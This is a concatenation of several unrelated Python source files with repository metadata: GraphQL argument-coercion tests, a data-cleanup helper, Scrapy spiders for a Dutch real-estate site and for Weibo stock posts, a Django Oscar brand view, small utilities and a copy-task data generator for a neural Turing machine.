"""query ($param: [Int!] = null) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = null) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = [null]) { listNonNullIntField(param: $param) }""",
None,
{
"data": None,
"errors": [
{
"message": "Variable < $param > got invalid default value < [null] >.",
"path": None,
"locations": [{"line": 1, "column": 25}],
}
],
},
),
(
"""query ($param: [Int!] = [null]) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!] = [null]) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = [null]) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = 30) { listNonNullIntField(param: $param) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[33]"}},
),
(
"""query ($param: [Int!] = 30) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!] = 30) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = 30) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = [30]) { listNonNullIntField(param: $param) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[33]"}},
),
(
"""query ($param: [Int!] = [30]) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!] = [30]) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = [30]) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = [30, null]) { listNonNullIntField(param: $param) }""",
None,
{
"data": None,
"errors": [
{
"message": "Variable < $param > got invalid default value < [30, null] >.",
"path": None,
"locations": [{"line": 1, "column": 25}],
}
],
},
),
(
"""query ($param: [Int!] = [30, null]) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!] = [30, null]) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!] = [30, null]) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
None,
{
"data": None,
"errors": [
{
"message": "Variable < $param > of required type < [Int!]! > was not provided.",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": None},
{
"data": None,
"errors": [
{
"message": "Variable < $param > of non-null type < [Int!]! > must not be null.",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": None},
{"data": {"listNonNullIntField": "SUCCESS-[None]"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": [None]},
{
"data": None,
"errors": [
{
"message": "Variable < $param > got invalid value < [None] >; Expected non-nullable type < Int! > not to be null at value[0].",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]) { listNonNullIntField(param: $param) }""",
{"param": [20, None]},
{
"data": None,
"errors": [
{
"message": "Variable < $param > got invalid value < [20, None] >; Expected non-nullable type < Int! > not to be null at value[1].",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
None,
{
"data": None,
"errors": [
{
"message": "Variable < $param > of required type < [Int!]! > was not provided.",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": None},
{
"data": None,
"errors": [
{
"message": "Variable < $param > of non-null type < [Int!]! > must not be null.",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": [None]},
{
"data": None,
"errors": [
{
"message": "Variable < $param > got invalid value < [None] >; Expected non-nullable type < Int! > not to be null at value[0].",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": 20},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": [20]},
{"data": {"listNonNullIntField": "SUCCESS-[23]"}},
),
(
"""query ($param: [Int!]!) { listNonNullIntField(param: $param) }""",
{"param": [20, None]},
{
"data": None,
"errors": [
{
"message": "Variable < $param > got invalid value < [20, None] >; Expected non-nullable type < Int! > not to be null at value[1].",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($item: Int) { listNonNullIntField(param: [10, $item]) }""",
None,
{
"data": {"listNonNullIntField": None},
"errors": [
{
"message": "Argument < param > has invalid value < [10, $item] >.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 49}],
}
],
},
),
(
"""query ($item: Int) { listNonNullIntField(param: [10, $item]) }""",
{"item": None},
{
"data": {"listNonNullIntField": None},
"errors": [
{
"message": "Argument < param > has invalid value < [10, $item] >.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 49}],
}
],
},
),
(
"""query ($item: Int) { listNonNullIntField(param: [10, $item]) }""",
{"item": 20},
{"data": {"listNonNullIntField": "SUCCESS-[13-23]"}},
),
(
"""query ($item: Int = null) { listNonNullIntField(param: [10, $item]) }""",
None,
{
"data": {"listNonNullIntField": None},
"errors": [
{
"message": "Argument < param > has invalid value < [10, $item] >.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 56}],
}
],
},
),
(
"""query ($item: Int = null) { listNonNullIntField(param: [10, $item]) }""",
{"item": None},
{
"data": {"listNonNullIntField": None},
"errors": [
{
"message": "Argument < param > has invalid value < [10, $item] >.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 56}],
}
],
},
),
(
"""query ($item: Int = null) { listNonNullIntField(param: [10, $item]) }""",
{"item": 20},
{"data": {"listNonNullIntField": "SUCCESS-[13-23]"}},
),
(
"""query ($item: Int = 30) { listNonNullIntField(param: [10, $item]) }""",
None,
{"data": {"listNonNullIntField": "SUCCESS-[13-33]"}},
),
(
"""query ($item: Int = 30) { listNonNullIntField(param: [10, $item]) }""",
{"item": None},
{
"data": {"listNonNullIntField": None},
"errors": [
{
"message": "Argument < param > has invalid value < [10, $item] >.",
"path": ["listNonNullIntField"],
"locations": [{"line": 1, "column": 54}],
}
],
},
),
(
"""query ($item: Int = 30) { listNonNullIntField(param: [10, $item]) }""",
{"item": 20},
{"data": {"listNonNullIntField": "SUCCESS-[13-23]"}},
),
(
"""query ($item: Int!) { listNonNullIntField(param: [10, $item]) }""",
None,
{
"data": None,
"errors": [
{
"message": "Variable < $item > of required type < Int! > was not provided.",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($item: Int!) { listNonNullIntField(param: [10, $item]) }""",
{"item": None},
{
"data": None,
"errors": [
{
"message": "Variable < $item > of non-null type < Int! > must not be null.",
"path": None,
"locations": [{"line": 1, "column": 8}],
}
],
},
),
(
"""query ($item: Int!) { listNonNullIntField(param: [10, $item]) }""",
{"item": 20},
{"data": {"listNonNullIntField": "SUCCESS-[13-23]"}},
),
],
)
async def test_coercion_list_non_null_int_field(
engine, query, variables, expected
):
assert await engine.execute(query, variables=variables) == expected
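# The "SUCCESS-..." strings above come from resolve_list_field in
# tests/functional/coercers/common.py. A sketch consistent with the expected
# outputs (scalars arrive already bumped by 3 through the schema's coercion
# directives; the resolver just formats them); this is an illustration, not
# the library's exact implementation:
async def _resolve_list_field_sketch(parent, args, ctx, info):
    if "param" not in args:
        return "SUCCESS"
    if args["param"] is None:
        return "SUCCESS-[None]"
    return "SUCCESS-[" + "-".join(str(item) for item in args["param"]) + "]"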
|
[
"raulic.maximilien@gmail.com"
] |
raulic.maximilien@gmail.com
|
5791616a8a1e7dcf5a07fcf0815db7cdc553d58f
|
5496690d32082ab03cde34f773250ea2e985389a
|
/lib/cleanup.py
|
33c2ccf6b8b73942bec8665b2dcdb8289548e48e
|
[
"MIT"
] |
permissive
|
akshayah3/retriever
|
3dbbc586ef983f47f48bde5913cd16e6c760da57
|
00bcaae301bf3636a261498f92f0b86c89232bfe
|
refs/heads/master
| 2021-01-17T21:49:22.572745
| 2015-03-11T13:00:14
| 2015-03-11T13:00:14
| 32,079,469
| 0
| 0
| null | 2015-03-12T13:50:10
| 2015-03-12T13:50:10
| null |
UTF-8
|
Python
| false
| false
| 746
|
py
|
def correct_invalid_value(value, args):
    """Replace null indicators (listed in args["nulls"]) with None."""
    try:
        if value in args["nulls"]:
            return None
        if float(value) in [float(item) for item in args["nulls"]]:
            return None
        return value
    except (ValueError, TypeError):
        # value (or a null indicator) was not numeric; return it unchanged
        return value
def no_cleanup(value, args):
"""Default cleanup function, returns the unchanged value."""
return value
class Cleanup:
"""This class represents a custom cleanup function and a dictionary of
arguments to be passed to that function."""
def __init__(self, function=no_cleanup, **kwargs):
self.function = function
self.args = kwargs
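# Usage sketch (values are hypothetical): pair Cleanup with the function above
# so a loading script can normalize its null markers.
if __name__ == "__main__":
    cleanup = Cleanup(correct_invalid_value, nulls=["-999", "NA"])
    for raw in ["3.14", "-999", "NA", "text"]:
        print(cleanup.function(raw, cleanup.args))  # 3.14, None, None, text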
|
[
"ben@bendmorris.com"
] |
ben@bendmorris.com
|
9aef24d3278c40b5258428b9026a9b8bebb8da91
|
b32f7acad62ac8c7daeac729a79a25e887698fb0
|
/main.py
|
38ce077804b97c66bd110cbe4b24ed77a589fab1
|
[] |
no_license
|
gauravsuryagandh/qbox_pivot
|
173db153bf2cb5b6b3c9781ef24531ae96860f4f
|
629abeec1440200554ad00645f7b573a82e78a23
|
refs/heads/master
| 2020-03-19T01:45:02.860841
| 2018-05-31T16:55:54
| 2018-05-31T16:55:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 794
|
py
|
#!/usr/bin/python
# system wide imports
import os
import sys

# local imports
import utils

################################################################################
# Function : main()
# Main routine for the entire program. This is where the program gets started.
# It prints the bhavcopy rows for equity (EQ) symbols that are also on the
# F&O list.
################################################################################
def main():
    print("Executing qbox with pivot based trading")
    fno_list = utils.get_list_of_fno()
    f_list = utils.get_last_file("bhavcopy", 1)
    f_name = "bhavcopy/" + f_list[0]
    with open(f_name) as fp:
        for each in fp:
            l = each.strip().split(',')
            if l[1] != "EQ":
                continue
            if l[0] in fno_list:
                print(l)

# calling main function
if __name__ == "__main__":
    main()
|
[
"gaurav.suryagandh@gmail.com"
] |
gaurav.suryagandh@gmail.com
|
db5bb3b990389bd21500fc823b8084ab408db73d
|
65311c6b01fe056021b815f62f3723f5b52a3251
|
/realestate/spiders/vandewater.py
|
501b7ba29fefd8949010e4dc7ee43221b2c0a645
|
[] |
no_license
|
velibor7/real_estate_nt
|
98e31e06ffaecfe8fdbf960fd7a6f259a1f8f41e
|
c470e47ec160d83436e5f845674ecc9ef63e9cfa
|
refs/heads/master
| 2023-02-09T10:36:36.261055
| 2021-01-03T18:58:52
| 2021-01-03T18:58:52
| 326,479,570
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,213
|
py
|
import scrapy
from ..items import RealestateItem
class VandewaterSpider(scrapy.Spider):
name = 'vandewater'
start_urls = ['https://vandewatergroep.nl/bestaande-woningen/#q1bKzs8vyCgtLVKyAjOVdMBUQVFmVrGSVbVSbmIFUMbI3NTAwECpVkcpvygltSipEihWXJJYUlpslVicrFQLAA/']
    def parse(self, response):
        for href in response.xpath('//*[(@id = "entity-items")]//*[contains(@class, "overlay")]/@href'):
            url = response.urljoin(href.get())
            self.logger.info('Scraping url: %s', url)
            yield scrapy.Request(url, callback=self.parse_item)

    def parse_item(self, response):
        item = RealestateItem()
        item['title'] = response.xpath('//h1/text()').get()
        for row in response.xpath('//div[contains(@class, "container")]//li[contains(@class, "clearfix")]'):
            key_text = row.xpath('./strong//text()').get()
            if key_text is None:
                continue
            key = key_text.lower().replace(' ', '_')
            val = row.xpath('./span//text()').get()
            # keep only the keys that RealestateItem actually declares
            if key in item.fields:
                item[key] = val
        yield item
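# For completeness, a sketch of the RealestateItem the spider assumes (the real
# definition lives in ../items.py; every field name besides 'title' below is
# illustrative):
#
# import scrapy
#
# class RealestateItem(scrapy.Item):
#     title = scrapy.Field()
#     prijs = scrapy.Field()            # price, as labelled on the site
#     woonoppervlakte = scrapy.Field()  # living area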
|
[
"veliborvasiljevic7@gmail.com"
] |
veliborvasiljevic7@gmail.com
|
e91d2e3690a2450a3223f4190a553e6b502a4342
|
dbe5973d69df9c5a5f3b06b7451a0de7086ebda4
|
/myapps/catalogue/views.py
|
344f4fb57000ed997cba4f2d20828f35255ffc33
|
[] |
no_license
|
phares/mall
|
29e7c0fdf3222a05161de36c8252167ab59df7be
|
d3f0093828c892ce46d55afaa245e5780555cc68
|
refs/heads/master
| 2021-01-22T23:53:27.535609
| 2017-04-30T09:17:53
| 2017-04-30T09:17:53
| 85,676,779
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,009
|
py
|
from django.contrib import messages
from django.core.paginator import EmptyPage, InvalidPage
from django.shortcuts import redirect
from django.utils.translation import ugettext_lazy as _

from oscar.apps.catalogue.views import CatalogueView
class BrandsView(CatalogueView):
"""
Browse all products by a brand in the catalogue
"""
def get(self, request, *args, **kwargs):
try:
self.search_handler = self.get_search_handler(
self.request.GET, request.get_full_path(), [], brand=kwargs["brand"])
except InvalidPage:
# Redirect to page one.
messages.error(request, _('The given page number was invalid.'))
return redirect('catalogue:index')
return super(CatalogueView, self).get(request, *args, **kwargs)
def get_context_data(self, **kwargs):
ctx = {}
ctx['summary'] = _("All products of a brand")
search_context = self.search_handler.get_search_context_data(
self.context_object_name)
ctx.update(search_context)
return ctx
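# Hooking the view up (a sketch; the project's actual URLconf is elsewhere and
# the pattern name is illustrative):
#
# from django.conf.urls import url
# from myapps.catalogue.views import BrandsView
#
# urlpatterns = [
#     url(r'^brand/(?P<brand>[\w-]+)/$', BrandsView.as_view(), name='brand'),
# ]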
|
[
"cndeti@gmail.com"
] |
cndeti@gmail.com
|
1bdfb69445257f436469696d3a49af63019ffb14
|
12015a25b4aae78d8d12776a2244e8f6426cdae6
|
/ArticleSpider/utils/common.py
|
f2b0d63bcd3b3caa2217a6a50abf9154cb2fe285
|
[] |
no_license
|
Hezier1223/ArticleSpider
|
1947ffae7176e99a3ab9d6a9c3961b2bd3b5691a
|
058587b3af25f2531316e8a1aaf0800494175795
|
refs/heads/master
| 2021-05-08T18:52:19.741073
| 2018-02-04T05:51:46
| 2018-02-04T05:51:46
| 119,539,819
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 277
|
py
|
# Created by Max on 2/3/18
__author__ = 'Max'
import hashlib
def get_md5(url):
    """Return the hex MD5 digest of a url given as str or bytes."""
    if isinstance(url, str):
        url = url.encode('utf-8')
    m = hashlib.md5()
    m.update(url)
    return m.hexdigest()
if __name__ == '__main__':
print(get_md5('http://baidu.com'))
|
[
"arthur_zzh@126.com"
] |
arthur_zzh@126.com
|
3c31d12e488f49b753e915f610249d7d26a46a64
|
6d14de277ffc1d9d4637ca801c3bb95e46e6ad30
|
/data/gen_data_copy.py
|
2cf9917357362be877875b9c0a7e60e07bb7e486
|
[
"BSD-3-Clause"
] |
permissive
|
marcwww/pytorch-ntm
|
db7534b25a3709eedf5f9158c4bbca2032e28bcf
|
29c015f8fb7e1f33b99f6a1763daa64238297113
|
refs/heads/master
| 2021-07-18T08:19:59.176628
| 2018-08-17T07:23:29
| 2018-08-17T07:23:29
| 132,915,671
| 0
| 0
| null | 2018-05-10T14:56:56
| 2018-05-10T14:56:56
| null |
UTF-8
|
Python
| false
| false
| 1,421
|
py
|
import torch
import random
from torch.autograd import Variable
import numpy as np
import params
import pickle
def gen(num_batches,
batch_size,
seq_width,
min_len,
max_len):
"""Generator of random sequences for the copy task.
Creates random batches of "bits" sequences.
All the sequences within each batch have the same length.
The length is [`min_len`, `max_len`]
:param num_batches: Total number of batches to generate.
:param seq_width: The width of each item in the sequence.
:param batch_size: Batch size.
:param min_len: Sequence minimum length.
:param max_len: Sequence maximum length.
NOTE: The input width is `seq_width + 1`, the additional input
contain the delimiter.
"""
for batch_num in range(num_batches):
# All batches have the same sequence length
seq_len = random.randint(min_len, max_len)
seq = np.random.binomial(1, 0.5, (seq_len, batch_size, seq_width))
seq = Variable(torch.from_numpy(seq))
# The input includes an additional channel used for the delimiter
inp = Variable(torch.zeros(seq_len + 1, batch_size, seq_width + 1))
inp[:seq_len, :, :seq_width] = seq
inp[seq_len, :, seq_width] = 1.0 # delimiter in our control channel
outp = seq.clone()
yield batch_num+1, inp.float().to(params.device), outp.float().to(params.device)
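# Usage sketch (assumes params.device is configured, e.g. torch.device('cpu')):
if __name__ == '__main__':
    for batch_num, inp, outp in gen(num_batches=2, batch_size=4,
                                    seq_width=8, min_len=1, max_len=5):
        # inp carries one extra channel and one extra (delimiter) time step
        print(batch_num, inp.size(), outp.size())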
|
[
"474733787@qq.com"
] |
474733787@qq.com
|
789e6a6beda64793aed4cd190b26fef917ac5f1d
|
d13dfa83589ffdae4c6d43b0f6d678a1b0ac7a74
|
/Advanced/use_zip.py
|
2c551f3dadc2860db78ec7f4adb6d8d266f84ed1
|
[] |
no_license
|
aiden-dai/ai-python3
|
fbe4926250415fd576d8dd659b28332265a62472
|
41af446e632dcb91625605022919d9ceeda09997
|
refs/heads/master
| 2021-01-01T02:23:15.524141
| 2020-07-26T07:47:20
| 2020-07-26T07:47:20
| 239,138,124
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 249
|
py
|
from zipfile import ZipFile
import os
os.chdir('Data')
# Test archive
with ZipFile('test.zip', 'w') as myzip:
myzip.write('bank.csv', arcname='Bank.dat')
# Test extract
with ZipFile('test.zip', 'r') as myzip:
myzip.extractall(path='.')
|
[
"aiden.dai@gmail.com"
] |
aiden.dai@gmail.com
|
757fed9d12e967d8249afc838ac03799bae3aab4
|
95761ba9ca92c9bf68f3fb88524ee01ddba9b314
|
/api-web/src/www/application/modules/board_tag/handlers.py
|
1d8c20aa814b1c2ce2b59d7ca971e6b8158c6e93
|
[] |
no_license
|
duytran92-cse/nas-workboard
|
918adf4b976f04a13dc756f8dc32aecf397c6258
|
bebe7674a7c6e8a3776264f18a3b7ca6b417dc7e
|
refs/heads/master
| 2022-10-23T01:02:39.583449
| 2020-06-14T19:25:01
| 2020-06-14T19:25:01
| 272,268,882
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,321
|
py
|
from django.contrib.humanize.templatetags.humanize import naturaltime
from notasquare.urad_api import *
from application.models import *
from application import constants
from application.modules.common import helpers
class List(handlers.standard.ListHandler):
def create_query(self, data):
query = BoardTag.objects
board_id = data.get('board_id', 0)
query = query.filter(board_id=board_id)
if data.get('text', '') != '' :
query = query.filter(name__contains=data['text'])
return query
def serialize_entry(self, board_tag):
return {
'id': board_tag.id,
'board_id': board_tag.board_id,
'name': board_tag.name,
'icon': board_tag.icon,
'is_visible': board_tag.is_visible
}
class Get(handlers.standard.GetHandler):
def get_data(self, data):
board_tag = BoardTag.objects.get(pk=data['id'])
return {
'id': board_tag.id,
'board_id': board_tag.board_id,
'name': board_tag.name,
'icon': board_tag.icon,
'is_visible': board_tag.is_visible
}
class Create(handlers.standard.CreateHandler):
    def create(self, data):
        tag = BoardTag()
        tag.board_id = data.get('board_id', 0)
        tag.name = data.get('name', '')
        tag.icon = data.get('icon', 'zmdi zmdi-more')
        # assign directly: the old truthiness guard made it impossible to
        # create a hidden tag, since is_visible=False skipped the assignment
        tag.is_visible = data.get('is_visible', True)
        tag.save()
        return tag

class Update(handlers.standard.UpdateHandler):
    def update(self, data):
        tag = BoardTag.objects.get(pk=data['id'])
        if 'name' in data:
            tag.name = data['name']
        if 'icon' in data:
            tag.icon = data['icon']
        if 'is_visible' in data:
            # key-presence check, so False is an accepted update value
            tag.is_visible = data['is_visible']
        tag.save()
        return tag
class Delete(handlers.standard.DeleteHandler):
def delete(self, data):
tag = BoardTag.objects.get(pk=data['id'])
tag.delete()
return 1
|
[
"thanh.tran@etudiant.univ-lr.fr"
] |
thanh.tran@etudiant.univ-lr.fr
|
95603aa12d1bbc1868eb49a31aabadff865cf2f3
|
872846a41b967f0539ddd6c21d514ceea3f43e56
|
/weibosearch/spiders/weibo.py
|
ed0aff107aab5757b69e75ef96219b6b78a0e4b3
|
[] |
no_license
|
wangjinliang1991/weibo_gupiao_scrapy_tushare
|
d3f414cbdb1f5526c07d499cd38f6dd8268683d3
|
cd19620360d06d03bfa37e3a92808b8db706f5ac
|
refs/heads/master
| 2020-04-02T05:47:57.885142
| 2018-10-22T23:29:37
| 2018-10-22T23:29:37
| 154,106,072
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,617
|
py
|
# -*- coding: utf-8 -*-
import re

import scrapy
from scrapy import FormRequest, Request
import tushare as ts

from weibosearch.items import WeiboItem

class WeiboSpider(scrapy.Spider):
    name = 'weibo'
    allowed_domains = ['weibo.cn']
    search_url = 'https://weibo.cn/search/mblog'
    max_page = 100

    def start_requests(self):
        # one search per HS300 constituent code
        result = ts.get_hs300s()
        keywords = result['code'].tolist()
        for keyword in keywords:
            url = '{url}?keyword={keyword}'.format(url=self.search_url, keyword=keyword)
            for page in range(1, self.max_page + 1):
                data = {
                    'mp': str(self.max_page),
                    'page': str(page)
                }
                yield FormRequest(url, callback=self.parse_index,
                                  meta={'keyword': keyword}, formdata=data)

    def parse_index(self, response):
        weibos = response.xpath('//div[@class="c" and contains(@id, "M_")]')
        for weibo in weibos:
            is_forward = bool(weibo.xpath('.//span[@class="cmt"]').extract_first())
            if is_forward:
                detail_url = weibo.xpath('.//a[contains(., "原文评论[")]//@href').extract_first()
            else:
                detail_url = weibo.xpath('.//a[contains(., "评论[")]//@href').extract_first()
            if detail_url:
                yield Request(response.urljoin(detail_url), callback=self.parse_detail,
                              meta={'keyword': response.meta['keyword']})

    def parse_detail(self, response):
        id = re.search('comment\/(.*?)\?', response.url).group(1)
        url = response.url
        content = ''.join(response.xpath('//div[@id="M_"]//span[@class="ctt"]//text()').extract())
        comment_count = response.xpath('//span[@class="pms"]//text()').re_first('评论\[(.*)\]')
        forward_count = response.xpath('//a[contains(.,"转发[")]//text()').re_first('转发\[(.*)\]')
        like_count = response.xpath('//a[contains(.,"赞[")]//text()').re_first('赞\[(.*)\]')
        posted_at = response.xpath('//div[@id="M_"]//span[@class="ct"]//text()').extract_first(default=None)
        user = response.xpath('//div[@id="M_"]/div[1]/a/text()').extract_first(default=None)
        keyword = response.meta['keyword']
        weibo_item = WeiboItem()
        for field in weibo_item.fields:
            try:
                weibo_item[field] = eval(field)
            except NameError:
                self.logger.debug('Field is not defined: ' + field)
        yield weibo_item
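# For reference, the eval(field) loop above only works if WeiboItem declares
# fields matching the local variable names in parse_detail. A sketch consistent
# with that (the real definition lives in weibosearch/items.py):
#
# import scrapy
#
# class WeiboItem(scrapy.Item):
#     id = scrapy.Field()
#     url = scrapy.Field()
#     content = scrapy.Field()
#     comment_count = scrapy.Field()
#     forward_count = scrapy.Field()
#     like_count = scrapy.Field()
#     posted_at = scrapy.Field()
#     user = scrapy.Field()
#     keyword = scrapy.Field()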
|
[
"632180350@qq.com"
] |
632180350@qq.com
|